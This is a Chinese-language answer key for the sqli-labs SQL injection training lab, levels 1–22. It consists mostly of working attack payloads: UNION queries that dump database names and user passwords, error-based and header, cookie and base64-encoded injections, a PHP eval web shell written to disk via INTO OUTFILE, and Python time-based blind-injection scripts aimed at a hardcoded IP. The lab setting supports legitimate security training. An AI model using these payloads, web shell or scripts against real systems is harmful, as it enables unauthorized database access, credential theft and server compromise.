[sqli-labs]Less1~22答案

Less-1
?id=1' order by 3
#正常
?id=1' order by 4
#Unknown column '4' in 'order clause'
?id=666' union select 1,2,(select group_concat(schema_name) from information_schema.schemata) --+
# information_schema,challenges,mysql,performance_schema,security

?id=666' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 'security') --+
# emails,referers,uagents,users
?id=666' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name = 'users') --+
# id,username,password
?id=666' union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+

# Dumb,Angelina,   Dummy,  secure,stupid,   superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
# Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

Less-2
# 方法同上,不過此題爲數值查詢
?id=666 union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)

Less-3
?id=666') union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+ 

Less-4
?id=666") union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+ 

Less-5
# 頁面沒有顯示位。無法使用聯合查詢注入 採用報錯注入
# and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)
?id=1' and (select 1 from (select count(*),concat(((select group_concat(schema_name) from information_schema.schemata)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
# Subquery returns more than 1 row
?id=1' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
# Duplicate entry 'security;1' for key 'group_key'
?id=1' and (select 1 from (select count(*),concat(((select concat(table_name,";") from information_schema.tables where table_schema = 'security' limit 3, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
# Duplicate entry 'users;1' for key 'group_key'
# 以此類推

Less-6
# 把'換成"

Less-7
?id=-1')) union select "<?php @eval($_POST['my']);?>" into outfile "path" --+
# 一句話連上即可

Less-8
# '))改爲'

Less-9&10
#區別是前者'後者"
#經過測試發現本題是時間盲注,附上腳本:
# coding:utf-8
import requests
import datetime


def database_len(url):  # 獲取數據庫名長度
    for i in range(1, 10):
        payload = '''?id=1' and if(length(database())>%s,sleep(1),0)''' % i
        time1 = datetime.datetime.now()
        r = requests.get(url + payload + '%23')
        time2 = datetime.datetime.now()
        sec = (time2 - time1).seconds
        if sec >= 1:
            print(i)
        else:
            print(i)
            break
    print('database_len:', i)
    return i


def database_name(url, database_len):  # 獲取數據庫名
    name = ''
    for j in range(1, database_len + 1):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz':
            payload = '''?id=1' and if(substr(database(),%d,1)='%s',sleep(1),1)''' % (
                j, i)
            # print(url+payload+'%23')
            time1 = datetime.datetime.now()
            r = requests.get(url + payload + '%23')
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >= 1:
                name += i
                print(name)
                break
    print('database_name:', name)


url = '''http://43.247.91.228:84/Less-9/'''
database_len = database_len(url)
database_name(url, database_len)
#database_name: security

Less-11
?uname=' or '1'='1&passwd=1'union select 1,(select group_concat(schema_name) from information_schema.schemata)#&submit=Submit
#' or '1'='1繞過

Less-12
?uname=") or ("1")=("1&passwd=1")union select 1,(select group_concat(schema_name) from information_schema.schemata)#&submit=Submit
#") or ("1")=("1繞過

Less-13
?uname=1') and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1)))  #
#>XPATH syntax error: ':security'
或者
?uname=1') and (select 1 from (select count(*),concat(((select concat(schema_name, " | ") from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a)  #
# Duplicate entry 'security | 1' for key 'group_key'

Less-14
把')換成"

Less-15
#沒有啥反應哈,試了試萬能密碼確定是',然後進行時間盲注,對之前的腳本做了個升級哈,這次是多線程
# coding:utf-8
import requests
import datetime
import threading


def database_len(url, i):
    postdata = {
        'uname': '''admin' and if(length(database())>%s,sleep(2),0) #''' % i,
        'passwd': '''1'''
    }
    time1 = datetime.datetime.now()
    r = requests.post(url, data=postdata)
    time2 = datetime.datetime.now()
    sec = (time2 - time1).seconds
    if sec >= 2:
        return True
    else:
        return False


def database_name(url, j):  # 獲取數據庫名
    for i in '0123456789abcdefghijklmnopqrstuvwxyz':
        postdata = {
            'uname': '''admin' and if(substr(database(),%d,1)='%s',sleep(2),1) #''' % (j, i),
            'passwd': '''1'''
        }
        # print(url+payload+'%23')
        time1 = datetime.datetime.now()
        r = requests.post(url, data=postdata)
        time2 = datetime.datetime.now()
        sec = (time2 - time1).seconds
        if sec >= 2:
            return i


class MyThread(threading.Thread):
    def __init__(self, func, args):
        threading.Thread.__init__(self)
        self.func = func
        self.args = args

    def getresult(self):
        return self.res

    def run(self):
        self.res = self.func(*self.args)


def main():
    flag = True
    url = '''http://43.247.91.228:84/Less-15/'''
    while flag:
        threads = []
        for i in range(0, 9):
            t = MyThread(database_len, (url, i + 1))
            threads.append(t)
            threads[i].start()
        for i in range(0, 9):
            threads[i].join()
            if not threads[i].getresult():
                flag = False
                databaselength = i + 1
                print('database_len:', databaselength)
                break
    threads = []
    name = ''
    for i in range(0, databaselength):
        t = MyThread(database_name, (url, i + 1))
        threads.append(t)
        threads[i].start()
    for i in range(0, databaselength):
        threads[i].join()
        name += threads[i].getresult()
    print("database_name :" + name)


if __name__ == '__main__':
    main()

#database_len: 8
#database_name :security

Less-16
'改成")

Less-17
#嘗試了一會兒發現這裏只有知道用戶名才能進行注入哈,隨便試了個admin發現可以,在密碼發現有語法報錯,於是採用報錯注入
?uname=admin&passwd=1' and (select 1 from (select count(*),concat(((select concat(schema_name, " | ") from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a)  #&submit=Submit

Less-18
#發現頁面會返回ip和user-agent,改了下xxf發現不行呀,於是嘗試在user-agent注入
User-Agent:1' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1)))  and '1'='1
# XPATH syntax error:':security'

Less-19
#顯示位在referer,所以嘗試在這裏注入
Referer:1' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
uname=admin&passwd=admin&submit=Submit
#"security;1"

Less-20
#在cookie裏面注入
Cookie: uname=' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1)))  and '1'='1

Less-21
Cookie: uname=JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCI6Iiwoc2VsZWN0IHNjaGVtYV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhIGxpbWl0IDQsMSkpKSAgYW5kICcxJz0nMQ==
# 觀察了一下要base64,這種形式還是第一次見2333

Less-22
#和上題一樣哈,不過把'改成"
Cookie: uname=IiBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCI6Iiwoc2VsZWN0IHNjaGVtYV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhIGxpbWl0IDQsMSkpKSAgYW5kICIxIj0iMQ==